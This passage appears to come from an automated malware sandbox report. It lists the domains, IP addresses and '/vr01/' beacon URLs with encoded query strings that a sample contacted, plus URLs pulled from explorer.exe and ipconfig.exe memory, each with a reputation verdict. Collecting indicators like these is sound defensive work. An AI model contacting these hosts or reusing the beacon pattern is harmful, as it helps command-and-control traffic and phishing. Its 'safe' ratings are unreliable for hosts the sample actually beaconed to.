              http://www.yoursweets.online/vr01/100%Avira URL Cloudmalware
              http://www.hsyxkj.comReferer:0%Avira URL Cloudsafe
              http://www.accidentapp.onlineReferer:0%Avira URL Cloudsafe
              http://www.flavorfog.online/vr01/0%Avira URL Cloudsafe
              http://www.yesxoit.xyz/vr01/www.gratiasempirellc.com0%Avira URL Cloudsafe
              http://www.michellecaldwelldesign.com/vr01/0%Avira URL Cloudsafe
              http://www.mayorii.com0%Avira URL Cloudsafe
              http://www.familyofficesheet.com0%Avira URL Cloudsafe
              http://www.michellecaldwelldesign.comReferer:0%Avira URL Cloudsafe
              http://www.flavorfog.online/vr01/www.bharatcrimecontrol24news.com0%Avira URL Cloudsafe
              http://www.helyibudapest.comReferer:0%Avira URL Cloudsafe
              http://www.topdeals.biz/vr01/0%Avira URL Cloudsafe
              https://www.gratiasempirellc.com/comments/feed0%Avira URL Cloudsafe
              http://www.topdeals.biz0%Avira URL Cloudsafe
              http://www.laneflowlogistics.com/vr01/www.familyofficesheet.com0%Avira URL Cloudsafe
              http://www.accidentapp.online0%Avira URL Cloudsafe
              http://www.kirtirefrigeration.com/vr01/0%Avira URL Cloudsafe
              http://www.laneflowlogistics.com/vr01/0%Avira URL Cloudsafe
              http://www.gratiasempirellc.com/vr01/0%Avira URL Cloudsafe
              http://www.familyofficesheet.com/vr01/www.mayorii.com0%Avira URL Cloudsafe
              https://www.gratiasempirellc.com/xmlrpc.php?rsd0%Avira URL Cloudsafe
              http://www.kirtirefrigeration.com/vr01/?F8=0FWlSxHnm0VS79clrGeEzlQTpbLPYM717ItFtF8k1xbK31xxaWzDAorSZVSnHMmj/6/I&K0Dl=8pkho2W8C20%Avira URL Cloudsafe
              http://www.michellecaldwelldesign.com/vr01/www.accidentapp.online0%Avira URL Cloudsafe
              http://www.nicholsonflooringservices.com0%Avira URL Cloudsafe
              http://www.makeyousurprise.comReferer:0%Avira URL Cloudsafe
              www.yoursweets.online/vr01/100%Avira URL Cloudmalware
              http://www.familyofficesheet.com/vr01/?F8=kCWTp1EUleadtFJdIzCu6Df5MNzEbmwToUUw4IkBm959jVVvzkoQYbPRGEEyl/3/RaO8&K0Dl=8pkho2W8C20%Avira URL Cloudsafe
              http://www.helyibudapest.com0%Avira URL Cloudsafe
              http://www.makeyousurprise.com100%Avira URL Cloudphishing
              http://www.topdeals.bizReferer:0%Avira URL Cloudsafe
              http://www.yesxoit.xyz/vr01/0%Avira URL Cloudsafe
              http://www.bharatcrimecontrol24news.comReferer:0%Avira URL Cloudsafe
              http://www.yoursweets.onlineReferer:0%Avira URL Cloudsafe
              http://www.yesxoit.xyzReferer:0%Avira URL Cloudsafe
              http://www.flavorfog.onlineReferer:0%Avira URL Cloudsafe
              https://www.gratiasempirellc.com/wp-json/0%Avira URL Cloudsafe
              http://www.flavorfog.online/vr01/?F8=Qr63XqLLwL8kZKZ1R+KG3ClgUrm6jRe21pOgDYnjKSMcuwj3QpCJccHr2dssKI7zl3t9&K0Dl=8pkho2W8C20%Avira URL Cloudsafe
              http://www.gratiasempirellc.com/wp-content/themes/business-identity-mvp/style.css?ver=6.4.30%Avira URL Cloudsafe
              http://www.laneflowlogistics.com0%Avira URL Cloudsafe
              http://www.mayorii.com/vr01/www.flavorfog.online0%Avira URL Cloudsafe
              http://www.bharatcrimecontrol24news.com0%Avira URL Cloudsafe
              http://www.mayorii.comReferer:0%Avira URL Cloudsafe
              http://www.gratiasempirellc.com/vr01/www.laneflowlogistics.com0%Avira URL Cloudsafe
              http://www.kirtirefrigeration.com0%Avira URL Cloudsafe
              http://www.accidentapp.online/vr01/0%Avira URL Cloudsafe
              http://www.topdeals.biz/vr01/www.michellecaldwelldesign.com0%Avira URL Cloudsafe
              http://www.nicholsonflooringservices.com/vr01/www.hsyxkj.com0%Avira URL Cloudsafe
              http://www.topdeals.biz/vr01/?K0Dl=8pkho2W8C2&F8=nF7lN0R+GAMQz/Akw9zAFS8sK1vaMqXOBBmwCvkEKDYNrGKPEkcEeMds11lXmHU70D3D0%Avira URL Cloudsafe
              http://www.gratiasempirellc.com0%Avira URL Cloudsafe
              http://www.mayorii.com/vr01/0%Avira URL Cloudsafe
              http://www.kirtirefrigeration.comReferer:0%Avira URL Cloudsafe
              http://www.helyibudapest.com/vr01/0%Avira URL Cloudsafe
              http://www.familyofficesheet.comReferer:0%Avira URL Cloudsafe
              https://www.gratiasempirellc.com/feed0%Avira URL Cloudsafe
              http://www.hsyxkj.com/vr01/0%Avira URL Cloudsafe
              http://www.bharatcrimecontrol24news.com/vr01/www.kirtirefrigeration.com0%Avira URL Cloudsafe
              http://www.kirtirefrigeration.com/vr01/www.topdeals.biz0%Avira URL Cloudsafe
              http://www.nicholsonflooringservices.com/vr01/0%Avira URL Cloudsafe
              http://www.makeyousurprise.com/vr01/100%Avira URL Cloudphishing

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              www.topdeals.biz
              		72.14.185.43
              		truetrue
                		unknown
                accidentapp.online
                		3.33.130.190
                		truetrue
                  		unknown
                  gratiasempirellc.com
                  		45.88.201.15
                  		truetrue
                    		unknown
                    www.flavorfog.online
                    		35.214.118.179
                    		truetrue
                      		unknown
                      www.familyofficesheet.com
                      		104.16.36.105
                      		truetrue
                        		unknown
                        td-ccm-neg-87-45.wixdns.net
                        		34.149.87.45
                        		truetrue
                          		unknown
                          bharatcrimecontrol24news.com
                          		69.57.172.11
                          		truetrue
                            		unknown
                            laneflowlogistics.com
                            		76.223.105.230
                            		truetrue
                              		unknown
                              www.accidentapp.online
                              		unknown
                              		unknowntrue
                                		unknown
                                www.laneflowlogistics.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.michellecaldwelldesign.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.bharatcrimecontrol24news.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.gratiasempirellc.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.kirtirefrigeration.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.mayorii.com
                                          		unknown
                                          		unknowntrue
                                            		unknown

                                            Contacted URLs

                                            NameMaliciousAntivirus DetectionReputation
                                            http://www.laneflowlogistics.com/vr01/?K0Dl=8pkho2W8C2&F8=afsJSrVtQy935SgvDMKIlJRgvlqACV7EhITZbFrNAvlElQGaJzKQmMA6gaTM16h48AiDtrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.gratiasempirellc.com/vr01/?F8=w7umpJ+rfj3CGTpHxtSOPW9QQGzAdMNJjdAKE5hb1nYkCdk9PPEgcDhma/h12TSv3owP&K0Dl=8pkho2W8C2true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.bharatcrimecontrol24news.com/vr01/?K0Dl=8pkho2W8C2&F8=3hn83+NBBYNXWUD9Y/r7Xs4IAViW+ZrQ9Q/N09yYT452ZMDcSpE7Ef8yOdRKd9g47dJAtrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.accidentapp.online/vr01/?K0Dl=8pkho2W8C2&F8=XJpxajiERfwYWZCBMKFPnJULtBnU/CqQJGR7CZrrgovMO9KS90T7etXRllYWrqB0ffTStrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.kirtirefrigeration.com/vr01/?F8=0FWlSxHnm0VS79clrGeEzlQTpbLPYM717ItFtF8k1xbK31xxaWzDAorSZVSnHMmj/6/I&K0Dl=8pkho2W8C2true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.familyofficesheet.com/vr01/?F8=kCWTp1EUleadtFJdIzCu6Df5MNzEbmwToUUw4IkBm959jVVvzkoQYbPRGEEyl/3/RaO8&K0Dl=8pkho2W8C2true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            www.yoursweets.online/vr01/true
                                            • Avira URL Cloud: malware
                                            		low
                                            http://www.flavorfog.online/vr01/?F8=Qr63XqLLwL8kZKZ1R+KG3ClgUrm6jRe21pOgDYnjKSMcuwj3QpCJccHr2dssKI7zl3t9&K0Dl=8pkho2W8C2true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.topdeals.biz/vr01/?K0Dl=8pkho2W8C2&F8=nF7lN0R+GAMQz/Akw9zAFS8sK1vaMqXOBBmwCvkEKDYNrGKPEkcEeMds11lXmHU70D3Dtrue
                                            • Avira URL Cloud: safe
                                            		unknown

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            http://www.flavorfog.onlineexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.makeyousurprise.com/vr01/www.helyibudapest.comexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: phishing
                                            		unknown
                                            https://word.office.comonexplorer.exe, 00000002.00000000.1998453035.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4451988670.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.yesxoit.xyzexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.bharatcrimecontrol24news.com/vr01/explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.michellecaldwelldesign.comexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.hsyxkj.com/vr01/www.makeyousurprise.comexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.yoursweets.online/vr01/www.nicholsonflooringservices.comexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://www.hsyxkj.comexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.yoursweets.onlineexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            		unknown
                                            https://powerpoint.office.comcemberexplorer.exe, 00000002.00000002.4454590920.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2005015223.000000000C460000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.hsyxkj.comReferer:explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.accidentapp.online/vr01/www.yoursweets.onlineexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.laneflowlogistics.comReferer:explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://excel.office.comexplorer.exe, 00000002.00000003.3094901918.0000000009BAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094735270.0000000009B85000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4452782293.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3779046751.0000000009B8E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1998453035.0000000009B8A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780787324.0000000009C21000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		high
                                              http://schemas.microexplorer.exe, 00000002.00000002.4451565854.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1996456551.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1997368298.0000000008890000.00000002.00000001.00040000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.familyofficesheet.com/vr01/explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.nicholsonflooringservices.comReferer:explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.gratiasempirellc.comReferer:explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.yoursweets.online/vr01/explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.flavorfog.online/vr01/explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.yesxoit.xyz/vr01/www.gratiasempirellc.comexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.accidentapp.onlineReferer:explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.mayorii.comexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.familyofficesheet.comexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.helyibudapest.comReferer:explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.michellecaldwelldesign.com/vr01/explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.michellecaldwelldesign.comReferer:explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.flavorfog.online/vr01/www.bharatcrimecontrol24news.comexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.topdeals.biz/vr01/explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.gratiasempirellc.com/comments/feedexplorer.exe, 00000002.00000002.4457850151.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4448376202.000000000436F000.00000004.10000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.topdeals.bizexplorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
